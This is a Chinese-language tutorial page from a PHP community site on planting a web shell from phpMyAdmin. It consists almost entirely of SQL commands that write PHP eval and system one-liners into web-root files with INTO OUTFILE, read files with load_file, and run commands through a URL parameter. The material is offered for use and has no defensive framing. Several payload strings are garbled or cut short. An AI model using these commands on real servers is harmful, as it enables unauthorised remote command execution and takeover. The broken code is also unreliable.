当前位置:  首页  >  服务器技术  >  Linux/unix  >  Linux教程

最新phpmyadmin后台拿shell方法和技巧

CreateTABLElinuxso(cmdtextNOTNULL);InsertINTOlinuxso(cmd)VALUES(?phpeval($_POST[cmd])?);selectcmdfromstudyintooutfileE:wampwww7.php;DropTABLEIFEXISTSstudy;CreateTABLE`wangzi`(`wangzi`TEXTNOTNULL)TYPEM

 

Create TABLE linuxso (cmd text NOT NULL);
Insert INTO linuxso (cmd) VALUES('php eval($_POST[cmd])?>');
select cmd from study into outfile 'E:/wamp/www/7.php';
 
Drop TABLE IF EXISTS study;
 
 
Create TABLE `wangzi` (`wangzi` TEXT NOT NULL) TYPE = MYISAM; Insert INTO `wangzi` ( `wangzi` ) VALUES ('');
Select `wangzi` FROM `wangzi` INTO OUTFILE 'C:/xampp/htdocs/xampp/cmd.php'; Drop TABLE `wangzi`;
--------------------------------------------------------------------------
 
而后在国外bbs' target='_blank'>论坛上看到一老外的方法更简单:
 
1:select load_file('E:/xamp/www/linuxso.php');
 
2:select '\';system($_GET[\'cmd\']); echo \'\'; ?>' INTO OUTFILE 'E:/xamp/www/linuxso.php'
然后访问网站目录:http://localhost/linuxso.php?cmd=dir
 
3:写一句话: select ''INTO OUTFILE 'E:/xamp/www/linuxso.php'
 
第三个是直接在SQL查询里导出一句话,必须要先知道网站的路径
吐了个 "CAO" !
扫码关注 PHP1 官方微信号
PHP1.CN | 中国最专业的PHP中文社区 | PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | PHP问答
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved PHP1.CN 第一PHP社区 版权所有